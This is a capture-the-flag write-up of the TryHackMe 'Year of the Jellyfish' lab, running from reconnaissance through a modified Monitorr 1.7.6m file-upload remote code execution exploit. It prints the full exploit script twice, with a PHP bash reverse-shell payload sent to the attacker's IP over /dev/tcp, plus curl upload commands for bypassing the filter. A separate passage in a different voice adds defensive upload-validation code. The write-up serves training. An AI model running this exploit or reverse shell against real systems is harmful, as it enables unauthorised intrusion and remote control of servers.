[THM] Year of the Jellyfish

daxiaofeng

Preface

This box is Year of the Jellyfish on TryHackMe, rated hard, and it does have some teeth. The very first step, information gathering, means sidestepping a lot of rabbit holes and knowing to read the SSL certificate. The web part requires the ability to adjust an exploit: many public exploits do not work as downloaded and have to be debugged and modified. The privilege escalation part is mainly kernel privilege escalation, nothing special.

Information gathering

Port scan

root@ip-10-10-242-231:~# sudo nmap -p- --min-rate 10000 34.240.221.73

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-03 15:40 BST
Nmap scan report for ec2-34-240-221-73.eu-west-1.compute.amazonaws.com (34.240.221.73)
Host is up (0.00050s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
8000/tcp open http-alt
8096/tcp open unknown
22222/tcp open easyengine

Nmap done: 1 IP address (1 host up) scanned in 20.29 seconds

TCP scan with service detection and OS fingerprinting

root@ip-10-10-242-231:~# sudo nmap -sT -sV -O -sC -p21,22,80,443,8000,8096,22222 34.240.221.73

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-03 15:43 BST
Nmap scan report for ec2-34-240-221-73.eu-west-1.compute.amazonaws.com (34.240.221.73)
Host is up (0.00063s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to https://robyns-petshop.thm/
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Robyn's Pet Shop
| ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
| Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm
| Not valid before: 2023-06-03T14:34:57
|_Not valid after: 2024-06-02T14:34:57
|_ssl-date: TLS randomness does not represent time
8000/tcp open http-alt
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Length: 15
|_ Request
|_http-title: Under Development!
8096/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Connection: close
| Date: Sat, 03 Jun 2023 14:43:59 GMT
| Server: Kestrel
| Content-Length: 0
| X-Response-Time-ms: 210
| GenericLines:
| HTTP/1.1 400 Bad Request
| Connection: close
| Date: Sat, 03 Jun 2023 14:43:34 GMT
| Server: Kestrel
| Content-Length: 0
| GetRequest, HTTPOptions:
| HTTP/1.1 302 Found
| Connection: close
| Date: Sat, 03 Jun 2023 14:43:34 GMT
| Server: Kestrel
| Content-Length: 0
| Location: /web/index.html
| Help, Kerberos, SSLSessionReq, TLSSessionReq:
| HTTP/1.1 400 Bad Request
| Connection: close
| Date: Sat, 03 Jun 2023 14:43:49 GMT
| Server: Kestrel
| Content-Length: 0
| LDAPSearchReq, LPDString:
| HTTP/1.1 400 Bad Request
| Connection: close
| Date: Sat, 03 Jun 2023 14:43:59 GMT
| Server: Kestrel
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 505 HTTP Version Not Supported
| Connection: close
| Date: Sat, 03 Jun 2023 14:43:34 GMT
| Server: Kestrel
|_ Content-Length: 0
22222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:99:92:52:8e:73:ed:91:01:d3:a7:a0:87:37:f0:4f (RSA)
| 256 5a:c0:cc:a1:a8:79:eb:fd:6f:cf:f8:78:0d:2f:5d:db (ECDSA)
|_ 256 0a:ca:b8:39:4e:ca:e3:cf:86:5c:88:b9:2e:25:7a:1b (EdDSA)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8000-TCP:V=7.60%I=7%D=6/3%Time=647B519B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x20
SF:15\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8096-TCP:V=7.60%I=7%D=6/3%Time=647B5196%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20clos
SF:e\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:34\x20GMT\r\nServer:\x
SF:20Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(GetRequest,8D,"HTTP/1\.1\
SF:x20302\x20Found\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x
SF:202023\x2014:43:34\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200
SF:\r\nLocation:\x20/web/index\.html\r\n\r\n")%r(HTTPOptions,8D,"HTTP/1\.1
SF:\x20302\x20Found\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\
SF:x202023\x2014:43:34\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x20
SF:0\r\nLocation:\x20/web/index\.html\r\n\r\n")%r(RTSPRequest,87,"HTTP/1\.
SF:1\x20505\x20HTTP\x20Version\x20Not\x20Supported\r\nConnection:\x20close
SF:\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:34\x20GMT\r\nServer:\x2
SF:0Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(Help,78,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun
SF:\x202023\x2014:43:49\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x2
SF:00\r\n\r\n")%r(SSLSessionReq,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Connection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:49\
SF:x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(TLSSes
SF:sionReq,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\
SF:r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:49\x20GMT\r\nServer:\x20
SF:Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(Kerberos,78,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20
SF:Jun\x202023\x2014:43:49\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:
SF:\x200\r\n\r\n")%r(FourOhFourRequest,8F,"HTTP/1\.1\x20404\x20Not\x20Foun
SF:d\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:4
SF:3:59\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200\r\nX-Response
SF:-Time-ms:\x20210\r\n\r\n")%r(LPDString,78,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2
SF:014:43:59\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200\r\n\r\n"
SF:)%r(LDAPSearchReq,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:
SF:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:59\x20GMT\r\nS
SF:erver:\x20Kestrel\r\nContent-Length:\x200\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.10 (93%), Linux 3.10 - 4.8 (93%), Linux 3.2 - 4.8 (93%), Linux 3.4 - 3.10 (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Synology DiskStation Manager 5.2-5644 (91%), Linux 2.6.22 - 2.6.36 (89%), Linux 2.6.39 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.96 seconds

There is a lot of information here (and in fact a lot of rabbit holes). The main directions for now: port 21 is FTP, check for anonymous login; 80 and 443 are obviously web; 8000 and 8096 are unknown, look at them later; 22 and 22222 are both SSH.

Run a vulnerability scan first.

root@ip-10-10-242-231:~# sudo nmap --script=vuln 34.240.221.73

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-03 15:46 BST
Nmap scan report for ec2-34-240-221-73.eu-west-1.compute.amazonaws.com (34.240.221.73)
Host is up (0.00051s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
|_sslv2-drown:
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /.gitignore: Revision control ignore file
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /content/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /themes/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
8000/tcp open http-alt
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
|_<html lang=\"en\"><head><title>Under Development!</title><meta charset=\"utf-8\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"></head><body><h1>Under Construction</h1><h2>This site is under development. Please be patient.</h2><p>If you have been given a specific ID to use when accessing this development site, please put it at the end of the url (e.g. ec2-34-240-221-73.eu-west-1.compute.amazonaws.com:8000/ID_HERE)</body></html>
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 53.23 seconds

root@ip-10-10-242-231:~# sudo nikto -h 34.240.221.73
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 34.240.221.73
+ Target Hostname: 34.240.221.73
+ Target Port: 80
+ Start Time: 2023-06-03 15:51:35 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: https://robyns-petshop.thm/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3931: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ 6544 items checked: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-06-03 15:51:46 (GMT1) (11 seconds)
---------------------------------------------------------------------------

It lists a few directories and shows that the page redirects to https://robyns-petshop.thm/. Add that hostname and the IP to `/etc/hosts`, otherwise the site cannot be reached.

Next, directory enumeration with dirb.

root@ip-10-10-242-231:~# sudo dirb https://34.240.221.73

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jun 3 15:55:12 2023
URL_BASE: https://34.240.221.73/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://34.240.221.73/ ----
==> DIRECTORY: https://34.240.221.73/assets/
+ https://34.240.221.73/business (CODE:401|SIZE:461)
==> DIRECTORY: https://34.240.221.73/config/
==> DIRECTORY: https://34.240.221.73/content/
+ https://34.240.221.73/index.php (CODE:200|SIZE:3631)
+ https://34.240.221.73/LICENSE (CODE:200|SIZE:1085)
==> DIRECTORY: https://34.240.221.73/plugins/
+ https://34.240.221.73/server-status (CODE:403|SIZE:279)
==> DIRECTORY: https://34.240.221.73/themes/
==> DIRECTORY: https://34.240.221.73/vendor/


---- Entering directory: https://34.240.221.73/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://34.240.221.73/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://34.240.221.73/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://34.240.221.73/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://34.240.221.73/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://34.240.221.73/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Jun 3 15:55:16 2023
DOWNLOADED: 4612 - FOUND: 4

It finds several directories, and opening them does show the files inside (directory listing is enabled).

Exploitation

With information gathering done, try each path in turn.

ftp

Anonymous FTP login fails, so drop this one.

web

The web side is quite busy.

Ports 80 and 443 serve a site built with PicoCMS (the site footer says it is built with Pico).

[image: homepage]

Apart from the home page and the contact page there is nothing else. The directories found earlier expose some files, but overall they only reveal the PicoCMS version; nothing else there helps much.

Port 8000 is a site described as under development; access requires an authorization ID appended to the URL. A few guesses like root, admin and robyn did not work, so set it aside for now.

[image: rabbithole2]

Port 8096 is just a login page. A few weak passwords failed, and the "forgot password" link explains that the reset flow can only be activated from the internal network, so there is no good way in for now. Skip it too.

[image: rabbithole]

Back to the site on port 80. A search on exploit-db (searchsploit on the AttackBox was not working properly for some reason) turned up a file inclusion vulnerability in PicoCMS, but it did not work, probably because of the version: that exploit targets a rather old Pico release.

This is where I got stuck. I looked up a walkthrough online and found I had skipped one step: collecting the SSL certificate information.

Indeed, the browser kept warning about the SSL connection, which should have prompted a look at the certificate. View the site's certificate directly in the browser.

[image: ssl_certificate]

The DNS Name entries in the SAN (Subject Alternative Name) list include several other domain names. Add them to hosts and visit them.

[image: vim-etc-hosts]

The beta and dev hostnames both point to the original site, while the monitorr hostname serves a new site.

[image: monitor]

Monitorr exploitation

The page footer shows that Monitorr is an open-source project on GitHub; following the link shows it is used for managing PHP web pages. Clicking Monitorr Settings at the bottom leads to the management page.

[image: monitorr-setting]

It requires a login, however, and simple weak passwords do not get in.

Does Monitorr itself have an exploitable vulnerability? A quick search on exploit-db shows it does.

[image: search-mon]

Try the second one directly, since remote code execution usually means a shell.

Download the script and run it:

root@ip-10-10-242-231:~# python3 48980.py https://monitorr.robyns-petshop.thm 10.10.242.231 443
Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 710, in urlopen
chunked=chunked,
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 386, in _make_request
self._validate_conn(conn)
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 1042, in _validate_conn
conn.connect()
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connection.py", line 424, in connect
tls_in_tls=tls_in_tls,
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/util/ssl_.py", line 450, in ssl_wrap_socket
sock, context, tls_in_tls, server_hostname=server_hostname
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.6/ssl.py", line 407, in wrap_socket
_context=self, _session=session)
File "/usr/lib/python3.6/ssl.py", line 817, in __init__
self.do_handshake()
File "/usr/lib/python3.6/ssl.py", line 1077, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/adapters.py", line 499, in send
timeout=timeout,
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 788, in urlopen
method, url, error=e, _pool=self, _stacktrace=sys.exc_info()[2]
File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/util/retry.py", line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='monitorr.robyns-petshop.thm', port=443): Max retries exceeded with url: /assets/php/upload.php (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "48980.py", line 26, in <module>
requests.post(url, headers=headers, data=data)
File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/api.py", line 115, in post
return request("post", url, data=data, json=json, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/adapters.py", line 563, in send
raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='monitorr.robyns-petshop.thm', port=443): Max retries exceeded with url: /assets/php/upload.php (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

It errors out immediately: SSL certificate verification failed. Searching for the error message shows that setting verify=False on the requests calls and disabling certificate verification globally fixes it, so modify the script and try again:

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys
import ssl
# Disable certificate verification globally
ssl._create_default_https_context = ssl._create_unverified_context

if len (sys.argv) != 4:
    print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"
    # Disable verification on this request
    requests.post(url, headers=headers, data=data, verify=False)

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    # Disable verification on this request
    requests.get(url, headers=headers, verify=False)

Start an nc listener and run the exploit again: no reverse shell comes back, even though the script reports success. Checking the path used in the code, /assets/data/usrimg/ contains only usrimg.png, so our reverse shell was never uploaded.

Reading the code more carefully, it uploads an image to the server through /assets/php/upload.php, i.e. it abuses a file upload vulnerability. Request that URL directly and see what comes back.

[image: upload-pos]

It returns an error: the file is not an image or exceeds the maximum upload size.

Let's debug the upload with curl to see exactly where it fails, building the curl upload command from the upload part of the exploit.

root@ip-10-10-242-231:~# curl -F "fileToUpload=@test.png" https://monitorr.robyns-petshop.thm/assets/php/upload.php
curl: (60) SSL certificate problem: unable to get local issuer certificate
More details here: https://curl.haxx.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

Looking up the error message, it is again the SSL certificate; adding -k to skip the SSL check is enough.

root@ip-10-10-242-231:~# curl -k -F "fileToUpload=@test.png" https://monitorr.robyns-petshop.thm/assets/php/upload.php
<div id='uploadreturn'>You are an exploit.</div><div id='uploaderror'>ERROR: test.png was not uploaded.</div></div>

A new problem: it says we are an exploit. Strange: visiting the page directly does not show this error, and test.png is just an image, not a PHP one-liner, so why would it call this an exploit?

Back on the upload.php page, open F12 and look at the request details to see whether anything is missing.

[image: no-error]

The request carries cookies, isHuman and PHPSESSID. Could the missing cookies be why our request is treated as a crafted attack?

[image: cookie]

Copy the cookie contents over and try again.

root@ip-10-10-242-231:~# curl -k -F "fileToUpload=@test.png" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "cookie: isHuman=1, PHPSESSID=gahu52u8e4u03qgav5hhvvku97"
<div id='uploadreturn'>File test.png is an image: <br><div id='uploadok'>File test.png has been uploaded to: ../data/usrimg/test.png</div></div>

The upload succeeds.

Now build the reverse shell. The content can be copied straight from the exploit: GIF89a213213123<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.242.231/8080 0>&1'");?>. With a GIF file header it should not be recognised, yet that alone does not work; only after trying a double extension with uppercase PHP does the upload succeed.
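The two workarounds above, the isHuman cookie and the double extension with uppercase PHP, each defeat one weak check in the upload handler. The Python below is an added example, not Monitorr's code and not part of the exploit: weak_check models a filter of the kind this write-up bypasses (case-sensitive, looks only at the last extension, trusts the magic bytes on their own), and hardened_check shows what an upload validator has to do to stop the same payload. The function names, extension lists and sample bodies are my own constructions; nothing here is taken from Monitorr's source.

```python
import os
import secrets

# Constructed lists (assumptions, not Monitorr's configuration): extensions the web
# server would execute, and the image types the upload endpoint is meant to accept.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
ALLOWED_IMAGE_EXTS = {"png", "gif", "jpg", "jpeg"}
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def looks_like_image(content: bytes) -> bool:
    """True if the body starts with any accepted image signature."""
    return any(content.startswith(m) for sigs in MAGIC.values() for m in sigs)


def weak_check(filename: str, content: bytes) -> bool:
    """Filter in the spirit of the one the write-up defeats: a case-sensitive look at the
    last extension plus a magic-byte check. 'shell.png.PHP' with a GIF header passes it."""
    if filename.rsplit(".", 1)[-1] == "php":
        return False
    return looks_like_image(content)


def hardened_check(filename: str, content: bytes) -> bool:
    """Reject anything the server could execute rather than display."""
    name = os.path.basename(filename).lower()      # drop path components, normalise case
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False                                # no extension, or nothing before it
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return False                                # .php anywhere in the name (x.php.png too)
    ext = parts[-1]
    if ext not in ALLOWED_IMAGE_EXTS:
        return False
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return False                                # signature must match the claimed type
    if b"<?" in content:
        return False                                # a PHP open tag has no business in an image
    return True


def stored_name(filename: str) -> str:
    """Server-chosen name: random stem, extension taken from the validated, lowercased client name.
    The client's name is never used as the path on disk."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    payload = b"GIF89a213213123<?php echo 1;"        # constructed polyglot body, harmless
    for fname in ("she_ll.php", "shell.png.PHP", "test.png"):
        body = payload if fname != "test.png" else b"\x89PNG\r\n\x1a\n" + bytes(16)
        print(f"{fname:14s} weak={weak_check(fname, body)!s:5s} hardened={hardened_check(fname, body)}")
```

stored_name is the complementary control: even with a validator, the file should be written under a server-chosen name and served from a location the PHP handler does not execute. A cookie such as isHuman is not an authentication or anti-automation control; as the curl test above shows, any client can set it.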

root@ip-10-10-242-231:~# vim shell.png.PHP 
root@ip-10-10-242-231:~# curl -k -F "fileToUpload=@shell.png.PHP" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "cookie: isHuman=1, PHPSESSID=gahu52u8e4u03qgav5hhvvku97"
<div id='uploadreturn'>File shell.png.PHP is an image: <br><div id='uploadok'>File shell.png.PHP has been uploaded to: ../data/usrimg/shell.png.php<

Request the uploaded file directly:

root@ip-10-10-242-231:~# curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/shell.png.php

Shell obtained.

Modifying the exploit

Having worked out why the upload failed, we can also modify the exploit directly so that it succeeds:

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys
import ssl

# Disable SSL certificate verification globally
ssl._create_default_https_context = ssl._create_unverified_context

if len (sys.argv) != 4:
    print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    # Add the cookies to the headers
    headers = {"cookie": "isHuman=1; PHPSESSID=gahu52u8e4u03qgav5hhvvku97", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}
    # Give the uploaded file a double extension with uppercase PHP to get past the file filter
    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.gif.PHP\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"

    requests.post(url, headers=headers, data=data, verify=False)  # verification disabled on the request

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.gif.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

    requests.get(url, headers=headers, verify=False)  # verification disabled on the request

This also gets a shell.

[image: after-change]

The user flag is under /var/www; I forgot to take a screenshot, just look for it yourself.

Privilege escalation

After logging in, sudo -l and a search for SUID files turn up nothing useful, the scheduled tasks have nothing usable either, and a manual walk through the filesystem reveals nothing.

Just run linpeas.

[+] [CVE-2021-4034] PwnKit

Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

